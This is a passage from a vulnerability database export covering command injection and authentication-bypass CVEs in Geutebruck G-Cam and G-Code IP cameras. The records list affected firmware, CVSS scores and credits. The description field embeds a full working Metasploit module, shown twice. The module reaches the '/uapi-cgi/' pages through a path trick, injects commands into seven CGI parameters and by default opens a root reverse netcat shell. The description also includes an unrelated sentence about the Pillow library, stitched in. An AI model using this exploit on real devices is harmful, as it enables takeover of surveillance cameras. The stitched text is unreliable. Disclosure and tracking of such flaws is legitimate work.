"id": "CVE-2021-33543"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-27T00:00:00",
"db": "VULMON",
"id": "CVE-2021-33543"
},
{
"date": "2021-07-29T08:30:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2022-09-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2095"
},
{
"date": "2023-11-07T03:35:51.383000",
"db": "NVD",
"id": "CVE-2021-33543"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2095"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
}
],
"trust": 0.6
}
}
VAR-202109-0850
Vulnerability from variot - Updated: 2025-01-30 20:43Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },
'Author' => [
'Titouan Lazard', # Of RandoriSec - Discovery
'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2021-33543'],
['CVE', '2021-33544'],
['CVE', '2021-33548'],
['CVE', '2021-33550'],
['CVE', '2021-33551'],
['CVE', '2021-33552'],
['CVE', '2021-33553'],
['CVE', '2021-33554'],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
[ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
],
'DisclosureDate' => '2021-07-08',
'Privileged' => true,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'CVE-2021-33544 - certmngr.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'createselfcert',
'local' => Rex::Text.rand_text_alphanumeric(10..16),
'country' => Rex::Text.rand_text_alphanumeric(2),
'state' => '$(PLACEHOLDER_CMD)',
'organization' => Rex::Text.rand_text_alphanumeric(10..16),
'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
'days' => Rex::Text.rand_text_numeric(2..4),
'type' => Rex::Text.rand_text_numeric(2..4)
},
'uri' => '/../uapi-cgi/certmngr.cgi'
}
],
[
'CVE-2021-33548 - factory.cgi', {
'http_method' => 'GET',
'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/factory.cgi'
}
],
[
'CVE-2021-33550 - language.cgi', {
'http_method' => 'GET',
'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/language.cgi'
}
],
[
'CVE-2021-33551 - oem.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'set',
'enable' => 'yes',
'environment.lang' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/oem.cgi'
}
],
[
'CVE-2021-33552 - simple_reclistjs.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'get',
'timekey' => Rex::Text.rand_text_numeric(2..4),
'date' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
}
],
[
'CVE-2021-33553 - testcmd.cgi', {
'http_method' => 'GET',
'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
'uri' => '/../uapi-cgi/testcmd.cgi'
}
],
[
'CVE-2021-33554 - tmpapp.cgi', {
'http_method' => 'GET',
'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/tmpapp.cgi'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
},
'Notes' => {
'Stability' => ['CRASH_SAFE'],
'Reliability' => ['REPEATABLE_SESSION'],
'SideEffects' => ['ARTIFACTS_ON_DISK']
}
)
)
end
def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end
unless res&.body && !res.body.empty?
print_error('Empty body in the response!')
return false
end
res_xml = res.get_xml_document
if res_xml.at('//firmware').nil?
print_error('Target did not respond with a XML document containing the "firmware" element!')
return false
end
raw_text = res_xml.at('//firmware').text
if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
else
print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
false
end
end
def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end
rex_version = Rex::Version.new(version)
vprint_status("Found Geutebruck version #{rex_version}")
if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit print_status("#{rhost}:#{rport} - Setting up request...")
method = target['http_method']
if method == 'GET'
http_method_vars = 'vars_get'
else
http_method_vars = 'vars_post'
end
http_vars = target['http_vars']
http_vars.each do |(k, v)|
if v.include? 'PLACEHOLDER_CMD'
http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
end
end
print_status("Sending CMD injection request to #{rhost}:#{rport}")
send_request_cgi(
{
'method' => method,
'uri' => target['uri'],
http_method_vars => http_vars
}
)
print_status('Exploit complete, you should get a shell as the root user!')
end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-0850",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2112",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2271",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * firmware 1.12.13.2 1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* een-20xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* efd-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ethc-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-cam"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* eec-2xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "works with the above firmware s e2 series camera models encoders"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ebc-21xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-code"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "( multiple products )"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ewpc-22xx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33554"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2084"
}
],
"trust": 0.6
},
"cve": "CVE-2021-33554",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-33554",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-33554",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-002023",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33554",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "info@cert.vde.com",
"id": "CVE-2021-33554",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2021-002023",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202107-2084",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2084"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33554"
},
{
"db": "NVD",
"id": "CVE-2021-33554"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n and exploits multiple authenticated arbitrary command execution vulnerabilities within\n the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n remote code execution as the root user. \n },\n\n \u0027Author\u0027 =\u003e [\n \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e [\n [\u0027CVE\u0027, \u00272021-33543\u0027],\n [\u0027CVE\u0027, \u00272021-33544\u0027],\n [\u0027CVE\u0027, \u00272021-33548\u0027],\n [\u0027CVE\u0027, \u00272021-33550\u0027],\n [\u0027CVE\u0027, \u00272021-33551\u0027],\n [\u0027CVE\u0027, \u00272021-33552\u0027],\n [\u0027CVE\u0027, \u00272021-33553\u0027],\n [\u0027CVE\u0027, \u00272021-33554\u0027],\n [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n ],\n \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n \u0027Privileged\u0027 =\u003e true,\n \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n \u0027Arch\u0027 =\u003e [ARCH_CMD],\n \u0027Targets\u0027 =\u003e [\n [\n \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33548 - factory.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33550 - language.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33551 - oem.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027set\u0027,\n \u0027enable\u0027 =\u003e \u0027yes\u0027,\n \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027get\u0027,\n \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n }\n ]\n ],\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n },\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n }\n )\n )\n end\n\n def firmware\n res = send_request_cgi(\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n )\n unless res\n print_error(\u0027Connection failed!\u0027)\n return false\n end\n\n unless res\u0026.body \u0026\u0026 !res.body.empty?\n print_error(\u0027Empty body in the 